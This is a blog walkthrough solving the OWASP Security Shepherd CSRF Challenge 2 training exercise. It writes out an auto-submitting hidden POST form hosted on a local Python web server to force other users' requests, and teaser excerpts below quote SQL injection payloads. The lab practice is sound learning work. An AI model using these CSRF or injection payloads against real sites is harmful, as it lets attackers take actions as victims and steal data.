OWASP Security Shepherd Project - CSRF 2 (CSRF Challenge)

-

Challenge


Solution

     In this challenge, we need to force other users to send a POST request to increase our counter. Actually, it is quite similar to challenge 1, but we are now using POST instead of GET.
     Before designing a POST request other users, we need to have a web server. That is because POST request are a little bit difficult than GET request, we can't just embedded it into a image or other web resource. We will need to make a form and make it submit automatically.
    Fortunately, Python provides us a very easy way to hold a temporary web server! Just run similar commands as the followings:
    1. mkdir /root/Desktop/temp
    2. cd /root/Desktop/temp
    3. python -m SimpleHTTPServer <port to listen> 
        (-m means module, SimpleHTTPServer is module name)

    Now, we have a web server run on the <port to listen> and use /root/Desktop/temp as root directory!
    Next, we need to design a POST form for other users. We could leverage the codes provided in CSRF lesson:
<form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST">
    <input type="hidden" name="giveMoneyTo" value="hacker" /> 
    <input type="hidden" name="giveAmount" value="1000" /> 
    <input type="submit"/> 
</form> 
<script> document.csrfForm.submit(); </script>
    However, we need to modify it to POST /user/csrfchallengetwo/plusplus with the parameter userId = ourId.
    As a result, the form should look like the followings:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengetwo/plusplus" method="POST">
    <input type="hidden" name="userId" value="ourId" />
    <input type="submit"/> 
</form> 
<script> document.evilForm.submit(); </script>
    Now, only one question left, that is what exactly is ourId?
To answer this question, let's try to see what can we get in BurpSuite?

Nothing~lol
Maybe it will be the same as challenge 1 which is 637e8d2e65542fe82fe6da3b0356bc0865b0b791?
    That would make our form become the followings:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengetwo/plusplus" method="POST">
    <input type="hidden" name="userId" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
    <input type="submit"/> 
</form> 
<script> document.evilForm.submit(); </script> 
    Next, what we need to do is to put the form into a simple HTML web page. As a result, we can google "HTML Web page Sample" and we will find this Example of a simple HTML page! Now, we slightly modified the sample HTML page and put our form into it as the followings:
    1. vim peter.html
    2. Press i for input mode
    3. Input

<HTML>
<HEAD>
<TITLE>Peter's Playground</TITLE>
</HEAD>
<H1>This is a Header</H1>
<H2>This is a Medium Header</H2>
<P> This is a new paragraph!
<P> <B>This is a new paragraph!</B>
<BR> <B><I>This is a new sentence without a paragraph break, in bold italics.</I></B>
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengetwo/plusplus" method="POST">
    <input type="hidden" name="userId" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
    <input type="submit"/>
</form>
<script> document.evilForm.submit(); </script>
</BODY>
</HTML>

    Then, let's input the URL of our webpage(Ex: http://192.168.1.6:7724/peter.html). After that, let's logout and login as another user's account to see what happens!

    It seems that we have successfully increase the counter! Let's login back to original account to see if we could pass.


    This completes the challenge : -)

留言

張貼留言

Welcome to share your comments or questions : -)
Enjoy life!

The Hottest Articles

OWASP Security Shepherd Project - My Practice & Solutions

-
圖片
    Security Shepherd is a Flagship project of OWASP. It is made as a web and mobile application security training platform.     As it is a famous framework for Web Application Pen Testing Traing, I want to start to write down my practice & solutions on the lessons and challenges of Security Shepherd for tracking.     The Official website: https://www.owasp.org/index.php/OWASP_Security_Shepherd My Practice & Solutions ======================================================================== Top 10 2013-A1-Injection Top 10-2017 A1-Injection My Practice:  SQL Injection Lesson Injection Challenge     - NoSQL Injection One     - SQL Injection 1     - SQL Injection 2     - SQL Injection 3     - SQL Injection 4     - SQL Injection 5     - SQL Injection 6     - SQL Injection 7     - SQL Injection Escaping     - SQL Injection Stored Procedure Mitigation Suggestions: SQL Injection Prevention Cheat Sheet ===============================================================
Read Full Article »

OSCP回顧 & 準備建議

-
圖片
緣起         去年, 2017年, 我完成了一趟學習上的奇妙旅程, 獲得了OSCP認證. 一開始很擔心自己的程度是不是足夠? 能不能花足夠多的時間在學習與練習? 幸運的是家人、朋友們都很支持我, 使我能在最後通過了長達24小時的認證考試.         寫這篇文章, 一方面是因為想回顧一下自己的學習歷程, 另一方面是我發現很少有中文的Review去介紹和給與準備考OSCP的人們一些建議, 所以希望由我自己開始, 為想要學習資訊安全的人們提供一個起始點 : -) Offensive Security & OSCP         Offensive Security是一家享譽業界的認證機構,其中最為人所知的便是Offensive Security是Kali Linux的製作與維護團隊。OSCP則是Offensive Security的旗艦級認證,可以說是講到Offensive Security就會想到OSCP。         OSCP因為它的考試是以24小時,獨立突破5台機器的實做模式聞名,也因此廣泛的被業界認可。擁有這張證照的成員,一般被認為有能力可以獨立進行滲透測試。 OSCP: https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ PWK(OSCP training course): https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/ 報名OSCP的資格         很多人會疑惑說,什麼樣的人有資格去報名OSCP課程?我是不是準備好了?甚至有網路上的文章說,OSCP是給資深高手的,菜鳥還是去考CEH好了!以我個人的經驗來說,我認為這些都不是值得擔心的事情。唯一的問題是你到底有多想學會?你是不是能在一次一次的失敗中,仍然堅持尋找解答?         首先談談我自己的背景,我從清華大學資訊工程學系畢業,後來到美國的哥倫比亞大學,讀了電腦安全的碩士。大家可能會認為我學了很多關於資安,我想某
Read Full Article »

OWASP Security Shepherd Project - SQL Injection 3 (Injection Challenge)

-
圖片
Challenge Solution     First step, let's try to input Mary Martin .     Then, let's try 1'or'1'='1 .     Well, maybe that's because 1 isn't a valid character for Name? Let's try a'or'a'='a .     Not bad, we get the user list. However, our purpose is to get credit card number. We must try to UNION SELECT the credit card number field!     The first thing comes to my mind is how can I get the table name and column names of this application database.     Try ' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE '1'='1 =>     Try ' UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='customer =>     Now, we are sure that the application doesn't have the privilege to access information_schema... Try to use GROUP BY to guess column name. Input ' group by name having '1'='1   => An error was detected! com.mysql.jdbc.exceptions.jdbc4
Read Full Article »